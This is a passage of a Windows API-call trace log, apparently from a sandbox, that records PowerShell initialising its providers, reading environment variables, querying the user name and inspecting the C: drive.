	[0145.185] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.185] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3c4) returned 0x0
	[0145.185] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.186] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3c8) returned 0x0
	[0145.186] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3cc) returned 0x0
	[0145.186] RegCloseKey (hKey=0x3cc) returned 0x0
	[0145.186] RegCloseKey (hKey=0x3a8) returned 0x0
	[0145.187] RegCloseKey (hKey=0x3c8) returned 0x0
	[0145.194] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
	[0145.277] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dbc100*="WSMan", lpRawData=0x3dbbe70) returned 1
	[0145.279] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.280] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.283] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0145.283] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0145.283] CoTaskMemFree (pv=0x1b7e6220) 
	[0145.283] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.283] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0145.284] CoTaskMemFree (pv=0x19eeb0) 
	[0145.284] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dc1638*="Alias", lpRawData=0x3dc13c8) returned 1
	[0145.286] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.286] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.289] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0145.289] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0145.290] CoTaskMemFree (pv=0x1b7e6220) 
	[0145.290] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.290] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0145.290] CoTaskMemFree (pv=0x19eeb0) 
	[0145.290] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dc6c30*="Environment", lpRawData=0x3dc69c0) returned 1
	[0145.292] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.292] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.293] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.293] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0145.293] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.293] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.293] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0145.293] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.293] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0145.513] SetErrorMode (uMode=0x1) returned 0x1
	[0145.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d160 | out: lpFileInformation=0x14d160*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0145.514] SetErrorMode (uMode=0x1) returned 0x1
	[0145.516] GetLogicalDrives () returned 0x4
	[0145.516] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0145.518] SetErrorMode (uMode=0x1) returned 0x1
	[0145.519] CoTaskMemAlloc (cb=0x68) returned 0x1b7d5eb0
	[0145.519] CoTaskMemAlloc (cb=0x68) returned 0x1b7d5f20
	[0145.519] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7d5eb0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d130, lpMaximumComponentLength=0x14d12c, lpFileSystemFlags=0x14d128, lpFileSystemNameBuffer=0x1b7d5f20, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d130*=0x9c354b42, lpMaximumComponentLength=0x14d12c*=0xff, lpFileSystemFlags=0x14d128*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0145.519] CoTaskMemFree (pv=0x1b7d5eb0) 
	[0145.519] CoTaskMemFree (pv=0x1b7d5f20) 
	[0145.519] SetErrorMode (uMode=0x1) returned 0x1
	[0145.519] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0145.521] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.521] SetErrorMode (uMode=0x1) returned 0x1
	[0145.521] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0145.521] SetErrorMode (uMode=0x1) returned 0x1
	[0145.521] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.522] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0145.522] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0145.523] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.523] SetErrorMode (uMode=0x1) returned 0x1
	[0145.524] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cf00 | out: lpFileInformation=0x14cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0145.524] SetErrorMode (uMode=0x1) returned 0x1
	[0145.524] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.524] SetErrorMode (uMode=0x1) returned 0x1
	[0145.524] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cf00 | out: lpFileInformation=0x14cf00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0145.524] SetErrorMode (uMode=0x1) returned 0x1
	[0145.524] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0145.524] SetErrorMode (uMode=0x1) returned 0x1
	[0145.525] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cfa0 | out: lpFileInformation=0x14cfa0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0145.525] SetErrorMode (uMode=0x1) returned 0x1
	[0145.525] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0145.525] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0145.526] CoTaskMemFree (pv=0x1b7e6220) 
	[0145.526] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.526] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0145.526] CoTaskMemFree (pv=0x19eeb0) 
	[0145.527] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec72b0*="FileSystem", lpRawData=0x2ec7040) returned 1
	[0145.732] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.732] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.733] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0145.733] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0145.734] CoTaskMemFree (pv=0x1b7e6220) 
	[0145.734] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.734] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0145.734] CoTaskMemFree (pv=0x19eeb0) 
	[0145.734] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eccaf0*="Function", lpRawData=0x2ecc880) returned 1
	[0145.735] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0145.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.735] CoTaskMemFree (pv=0x1b7a3d10) 
	[0145.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.993] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0145.993] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0145.994] CoTaskMemFree (pv=0x1b7e6220) 
	[0145.994] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.994] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0145.994] CoTaskMemFree (pv=0x19eeb0) 
	[0145.995] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2efeec8*="Registry", lpRawData=0x2efec58) returned 1
	[0146.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.029] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0146.029] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0146.030] CoTaskMemFree (pv=0x1b7e6220) 
	[0146.030] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0146.030] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0146.030] CoTaskMemFree (pv=0x19eeb0) 
	[0146.030] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f042e0*="Variable", lpRawData=0x2f04070) returned 1
	[0146.033] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.033] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.036] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.036] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.249] CoTaskMemAlloc (cb=0x804) returned 0x1b7e6220
	[0146.249] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e6220, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0146.249] CoTaskMemFree (pv=0x1b7e6220) 
	[0146.249] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0146.249] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0146.250] CoTaskMemFree (pv=0x19eeb0) 
	[0146.250] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f18138*="Certificate", lpRawData=0x2f17ec8) returned 1
	[0146.342] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.342] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.345] GetLogicalDrives () returned 0x4
	[0146.346] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0146.346] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0146.347] CoTaskMemAlloc (cb=0x20e) returned 0x24ef60
	[0146.347] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x24ef60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0146.347] CoTaskMemFree (pv=0x24ef60) 
	[0146.349] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.349] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.349] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.349] CoTaskMemFree (pv=0x1b7a3d10) 
	[0146.363] CoTaskMemAlloc (cb=0x104) returned 0x1b7a3d10
	[0146.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a3d10, nSize=0x80 | out: lpBuffer="") returned 0x0
